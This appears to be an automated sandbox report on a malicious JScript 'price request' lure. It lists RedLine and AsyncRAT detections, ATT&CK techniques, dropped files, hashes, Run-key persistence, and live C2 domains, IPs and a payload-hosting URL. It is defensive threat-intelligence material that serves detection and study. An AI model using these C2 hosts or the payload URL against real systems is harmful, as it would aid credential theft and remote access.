                        Source: Yara matchFile source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: 4.2.NaE.exe.35083c0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.0.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.wscript.exe.27d83495000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.0.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.wscript.exe.27d83f5a630.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.NaE.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.wscript.exe.27d83495000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.audio.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000003.1400639939.0000027D83495000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1404488524.0000027D83ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1461555095.0000000003508000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NaE.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\audio.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information311
                        Scripting                        		Valid Accounts1
                        Native API                        		311
                        Scripting                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		OS Credential Dumping1
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution                        		1
                        DLL Side-Loading                        		111
                        Process Injection                        		11
                        Deobfuscate/Decode Files or Information                        		LSASS Memory2
                        File and Directory Discovery                        		Remote Desktop ProtocolData from Removable Media11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter                        		1
                        Scheduled Task/Job                        		1
                        Scheduled Task/Job                        		12
                        Obfuscated Files or Information                        		Security Account Manager24
                        System Information Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Scheduled Task/Job                        		1
                        Registry Run Keys / Startup Folder                        		1
                        Registry Run Keys / Startup Folder                        		2
                        Software Packing                        		NTDS231
                        Security Software Discovery                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets31
                        Virtualization/Sandbox Evasion                        		SSHKeylogging213
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading                        		Cached Domain Credentials2
                        Process Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                        Virtualization/Sandbox Evasion                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                        Process Injection                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430766 Sample: Price request N#U00b0DEM230... Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 45 chonglee575.duckdns.org 2->45 47 postutopia.net 2->47 49 chongmei33.publicvm.com 2->49 57 Snort IDS alert for network traffic 2->57 59 Multi AV Scanner detection for domain / URL 2->59 61 Found malware configuration 2->61 65 20 other signatures 2->65 10 wscript.exe 4 15 2->10         started        15 audio.exe 3 2->15         started        17 audio.exe 2 2->17         started        signatures3 63 Uses dynamic DNS services 45->63 process4 dnsIp5 51 postutopia.net 51.254.27.105, 443, 49705 OVHFR France 10->51 41 C:\Users\user\AppData\Local\Temp\IDWYPJ.js, ASCII 10->41 dropped 43 C:\Users\user\AppData\Local\...\wp[1].js, ASCII 10->43 dropped 77 System process connects to network (likely due to code injection or exploit) 10->77 79 Benign windows process drops PE files 10->79 81 JScript performs obfuscated calls to suspicious functions 10->81 83 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->83 19 wscript.exe 2 10->19         started        file6 signatures7 process8 file9 37 C:\Users\user\AppData\Local\Temp37aE.exe, PE32 19->37 dropped 67 Windows Scripting host queries suspicious COM object (likely to drop second stage) 19->67 23 NaE.exe 1 6 19->23         started        signatures10 process11 file12 39 C:\Users\user\AppData\Local\Temp\audio.exe, PE32 23->39 dropped 69 Antivirus detection for dropped file 23->69 71 Multi AV Scanner detection for dropped file 23->71 73 Machine Learning detection for dropped file 23->73 75 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 23->75 27 cmd.exe 1 23->27         started        signatures13 process14 process15 29 audio.exe 2 27->29         started        33 conhost.exe 27->33         started        35 timeout.exe 1 27->35         started        dnsIp16 53 chonglee575.duckdns.org 141.101.134.51, 49746, 6974 NETZBETRIEB-GMBHDE Netherlands 29->53 55 chongmei33.publicvm.com 178.73.192.3, 2703, 49746 PORTLANEwwwportlanecomSE Sweden 29->55 85 Antivirus detection for dropped file 29->85 87 Multi AV Scanner detection for dropped file 29->87 89 Machine Learning detection for dropped file 29->89 signatures17

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        Price request N#U00b0DEM23000199.js33%VirustotalBrowse
                        Price request N#U00b0DEM23000199.js16%ReversingLabsScript-JS.Trojan.Cryxos

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\NaE.exe100%AviraTR/Dropper.Gen
                        C:\Users\user\AppData\Local\Temp\IDWYPJ.js100%AviraJS/Dldr.G8
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\wp[1].js100%AviraJS/Dldr.G8
                        C:\Users\user\AppData\Local\Temp\audio.exe100%AviraTR/Dropper.Gen
                        C:\Users\user\AppData\Local\Temp\NaE.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\audio.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\NaE.exe75%ReversingLabsWin32.Spyware.RedLine
                        C:\Users\user\AppData\Local\Temp\NaE.exe62%VirustotalBrowse
                        C:\Users\user\AppData\Local\Temp\audio.exe75%ReversingLabsWin32.Spyware.RedLine
                        C:\Users\user\AppData\Local\Temp\audio.exe62%VirustotalBrowse

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        SourceDetectionScannerLabelLink
                        chonglee575.duckdns.org11%VirustotalBrowse
                        postutopia.net4%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        chonglee575.duckdns.org100%Avira URL Cloudmalware
                        https://postutopia.net/wp-includes/images/smilies/wp.js&v;=0%Avira URL Cloudsafe
                        https://postutopia.net/0%Avira URL Cloudsafe
                        https://postutopia.net/wp-includes/images/smilies/wp.js0%Avira URL Cloudsafe
                        https://postutopia.net/c0%Avira URL Cloudsafe
                        https://postutopia.net/wp-includes/images/smilies/wp.js70%Avira URL Cloudsafe
                        https://postutopia.net/wp-includes/images/smilies/wp.jsG0%Avira URL Cloudsafe
                        https://postutopia.net/wp-includes/images/smilies/wp.js5%VirustotalBrowse
                        https://postutopia.net/4%VirustotalBrowse
                        https://postutopia.net/wp-includes/images/smilies/wp.jsW0%Avira URL Cloudsafe
                        chonglee575.duckdns.org11%VirustotalBrowse

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        chongmei33.publicvm.com
                        		178.73.192.3
                        		truefalse
                          		high
                          chonglee575.duckdns.org
                          		141.101.134.51
                          		truetrueunknown
                          postutopia.net
                          		51.254.27.105
                          		truetrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          chongmei33.publicvm.comfalse
                            		high
                            chonglee575.duckdns.orgtrue
                            • 11%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            		unknown
                            https://postutopia.net/wp-includes/images/smilies/wp.jstrue
                            • 5%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://postutopia.net/wscript.exe, 00000000.00000003.1398114001.0000015E7F9CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1401872911.0000015E7F9CD000.00000004.00000020.00020000.00000000.sdmptrue
                            • 4%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://postutopia.net/cwscript.exe, 00000000.00000003.1398114001.0000015E7F9CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1401872911.0000015E7F9CD000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://postutopia.net/wp-includes/images/smilies/wp.js&v;=wscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://postutopia.net/wp-includes/images/smilies/wp.js7wscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://postutopia.net/wp-includes/images/smilies/wp.jsGwscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://postutopia.net/wp-includes/images/smilies/wp.jsWwscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNaE.exe, 00000004.00000002.1460450489.0000000002653000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              178.73.192.3
                              		chongmei33.publicvm.comSweden
                              		42708PORTLANEwwwportlanecomSEfalse
                              51.254.27.105
                              		postutopia.netFrance
                              		16276OVHFRtrue
                              141.101.134.51
                              		chonglee575.duckdns.orgNetherlands
                              		201011NETZBETRIEB-GMBHDEtrue

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1430766
                              Start date and time:2024-04-24 06:59:41 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 14s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:16
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • GSI enabled (Javascript)
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Price request N#U00b0DEM23000199.js
                              renamed because original name is a hash value
                              Original Sample Name:Price request NDEM23000199.js
                              Detection:MAL
                              Classification:mal100.troj.evad.winJS@15/8@4/3
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 61%
                              • Number of executed functions: 37
                              • Number of non-executed functions: 28
                              Cookbook Comments:
                              • Found application associated with file extension: .js

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              07:00:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run audio "C:\Users\user\AppData\Local\Temp\audio.exe"
                              07:00:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run audio "C:\Users\user\AppData\Local\Temp\audio.exe"

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              51.254.27.105test.htmlGet hashmaliciousHTMLPhisherBrowse
                                141.101.134.51ORDER_202344..jsGet hashmaliciousAsyncRATBrowse
                                  cxI8z2rY3C.exeGet hashmaliciousAsyncRATBrowse
                                    ORDER-230316.xlsmGet hashmaliciousAsyncRATBrowse
                                      rIXVC7CIsu.exeGet hashmaliciousAsyncRATBrowse
                                        ORDER-230409.doc.exeGet hashmaliciousAsyncRATBrowse
                                          aGcp1Zk6yu.exeGet hashmaliciousAsyncRATBrowse
                                            SecuriteInfo.com.Heur.MSIL.Androm.1.13901.exeGet hashmaliciousAsyncRATBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              chongmei33.publicvm.comORDER-2436788-EQU.jsGet hashmaliciousWSHRatBrowse
                                              • 46.246.14.4
                                              PO-2301219.pdf.jsGet hashmaliciousWSHRatBrowse
                                              • 103.47.144.118
                                              SA___CS_Purchase_Order.xls.jsGet hashmaliciousWSHRatBrowse
                                              • 103.47.144.44
                                              ORDER-23118FC.pdf.jsGet hashmaliciousWSHRatBrowse
                                              • 103.47.144.63
                                              Ref-231017AF-Payment-Details.jsGet hashmaliciousAgentTesla, WSHRATBrowse
                                              • 103.47.144.71
                                              Payment_Copy.docx.vbsGet hashmaliciousAgentTesla, WSHRATBrowse
                                              • 104.243.242.103
                                              Payment_Copy.pdf.jsGet hashmaliciousWSHRATBrowse
                                              • 104.243.242.12
                                              Cash_Transfer_REF#23284449-9374647.jsGet hashmaliciousWSHRat, XWormBrowse
                                              • 103.47.144.93
                                              Ref-23105_Payment_Slip.pdf.jsGet hashmaliciousWSHRATBrowse
                                              • 103.47.144.64
                                              Purchase_Order.pdf.jsGet hashmaliciousWSHRatBrowse
                                              • 172.111.147.88
                                              chonglee575.duckdns.orgORDER_202344..jsGet hashmaliciousAsyncRATBrowse
                                              • 141.101.134.51
                                              cxI8z2rY3C.exeGet hashmaliciousAsyncRATBrowse
                                              • 141.101.134.51
                                              ORDER-230316.xlsmGet hashmaliciousAsyncRATBrowse
                                              • 141.101.134.51
                                              rIXVC7CIsu.exeGet hashmaliciousAsyncRATBrowse
                                              • 141.101.134.51
                                              ORDER-230409.doc.exeGet hashmaliciousAsyncRATBrowse
                                              • 141.101.134.51
                                              aGcp1Zk6yu.exeGet hashmaliciousAsyncRATBrowse
                                              • 141.101.134.51
                                              SecuriteInfo.com.Heur.MSIL.Androm.1.13901.exeGet hashmaliciousAsyncRATBrowse
                                              • 141.101.134.51
                                              dGSQxmfNFwvn.exeGet hashmaliciousAsyncRATBrowse
                                              • 141.101.134.37
                                              WvHz3PEgTl.exeGet hashmaliciousAsyncRATBrowse
                                              • 46.183.220.49
                                              MACHINE SPCIFICATIONS.exeGet hashmaliciousAsyncRATBrowse
                                              • 46.183.220.49

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              PORTLANEwwwportlanecomSExjXIE2ZFFSw4.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                              • 46.246.14.10
                                              xjXIE2ZFFSw4.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                              • 46.246.14.10
                                              BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                              • 188.126.94.80
                                              xVcsGL5R1Nbh.exeGet hashmaliciousNjratBrowse
                                              • 46.246.6.20
                                              xyyDAUDPeYEH.exeGet hashmaliciousNjratBrowse
                                              • 46.246.6.20
                                              xzcQo6GenFVf.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                              • 46.246.14.5
                                              tajma.x86-20240422-0535.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 188.126.69.245
                                              x7RZVIWaDKb5.exeGet hashmaliciousNjratBrowse
                                              • 46.246.14.17
                                              x7RZVIWaDKb5.exeGet hashmaliciousNjratBrowse
                                              • 46.246.14.17
                                              bUBL.exeGet hashmaliciousNjratBrowse
                                              • 46.246.14.17
                                              OVHFRSecuriteInfo.com.Python.Stealer.1437.14994.32063.exeGet hashmaliciousPython StealerBrowse
                                              • 151.80.29.83
                                              SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exeGet hashmaliciousXmrigBrowse
                                              • 54.37.232.103
                                              _file____C__Users_hp_Downloads_C__Users_moodyt_AppData_Local_Temp_2_RemittanceAdvice17-Apr-2024.htmlGet hashmaliciousUnknownBrowse
                                              • 51.222.241.106
                                              Remittance. #U0440df.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 51.222.241.100
                                              TeaiGames.exeGet hashmaliciousNovaSentinelBrowse
                                              • 51.178.66.33
                                              https://www.sushi-idea.com/Get hashmaliciousUnknownBrowse
                                              • 51.83.143.92
                                              SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                                              • 137.74.204.214
                                              BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                              • 94.23.249.222
                                              BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                              • 51.75.78.69
                                              m2 Cotizaci#U00f3n-1634.pdf.exeGet hashmaliciousFormBookBrowse
                                              • 94.23.112.190
                                              NETZBETRIEB-GMBHDEhttp://tr138649325.recuperacionesbancarias.comGet hashmaliciousUnknownBrowse
                                              • 185.103.10.2
                                              d4dtHo2bNn.elfGet hashmaliciousMiraiBrowse
                                              • 93.159.212.222
                                              lRgFFON2H0.elfGet hashmaliciousMiraiBrowse
                                              • 188.72.83.184
                                              https://tr195371688.sabinayeasmin.info/c/8v9pl/i8fnl9ti/s2molj4edreGet hashmaliciousHTMLPhisherBrowse
                                              • 185.103.10.3
                                              http://freeganpulriefreezre.tkGet hashmaliciousUnknownBrowse
                                              • 46.243.143.249
                                              ORDER_202344..jsGet hashmaliciousAsyncRATBrowse
                                              • 141.101.134.51
                                              cxI8z2rY3C.exeGet hashmaliciousAsyncRATBrowse
                                              • 141.101.134.51
                                              ORDER-230316.xlsmGet hashmaliciousAsyncRATBrowse
                                              • 141.101.134.51
                                              rIXVC7CIsu.exeGet hashmaliciousAsyncRATBrowse
                                              • 141.101.134.51
                                              ORDER-230409.doc.exeGet hashmaliciousAsyncRATBrowse
                                              • 141.101.134.51

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              37f463bf4616ecd445d4a1937da06e19orden de compra.vbsGet hashmaliciousAgentTeslaBrowse
                                              • 51.254.27.105
                                              FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                              • 51.254.27.105
                                              DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              • 51.254.27.105
                                              G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              • 51.254.27.105
                                              Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                              • 51.254.27.105
                                              #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkGet hashmaliciousUnknownBrowse
                                              • 51.254.27.105
                                              181_960.msiGet hashmaliciousUnknownBrowse
                                              • 51.254.27.105
                                              UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                              • 51.254.27.105
                                              3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                              • 51.254.27.105
                                              mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                              • 51.254.27.105

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NaE.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Local\Temp\NaE.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):617
                                              Entropy (8bit):5.3554278163807965
                                              Encrypted:false
                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhat92n4M6:MLUE4K5E4KlKDE4KhKiKhg84j
                                              MD5:A238CE7696BC8B1D003EB7CEDDF15C97
                                              SHA1:CE312D2E534C686B1E02EB6117AE7C256698261D
                                              SHA-256:963FDD80F0BB46D58ED4C41B106B07A433A87EC0B20C7BB7C6BD830F37208328
                                              SHA-512:2546E782C8C8C078923C5F17E63F241C59FA2B6A4E6A4C892E38381CF596063092257A040F58B25823E6A6B2BE3061EBC7754586938CF87CD498269DFD68A097
                                              Malicious:false
                                              Reputation:low
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\audio.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Local\Temp\audio.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):520
                                              Entropy (8bit):5.355496254154943
                                              Encrypted:false
                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                                              MD5:3C255C75EA6EB42410894C0D08A4E324
                                              SHA1:34B3512313867B269C545241CD502B960213293A
                                              SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                                              SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\wp[1].js

                                              Download File
                                              Process:C:\Windows\System32\wscript.exe
                                              File Type:ASCII text, with very long lines (65164), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):305955
                                              Entropy (8bit):5.79663316602609
                                              Encrypted:false
                                              SSDEEP:6144:UaP0cFRNUIo3Ip9Sb11SbTAb1++tsnXkZUe/xOrQ0dESZy:zPdbNUIo3lb11SfAb1++tsnXO+Q0dLZy
                                              MD5:543BA48603F0ACCD9C3AE7A76E6A53C8
                                              SHA1:1BD9FB9375EC9DB0900F7EB09781AE6B57D33FFE
                                              SHA-256:BB31D8123C3B351AF8B7A851A9187E9E93394ACDA05B8DF5DC90BEB6939BAA78
                                              SHA-512:A446DE01D532DBEE3D8AC8625DB093CB5BE15E02FA68BD366F7E365E436D782B5F66C7762986B0A6B8D78812B34B852C272BD03ED56D6F603DF6EC3873C9D24F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Reputation:low
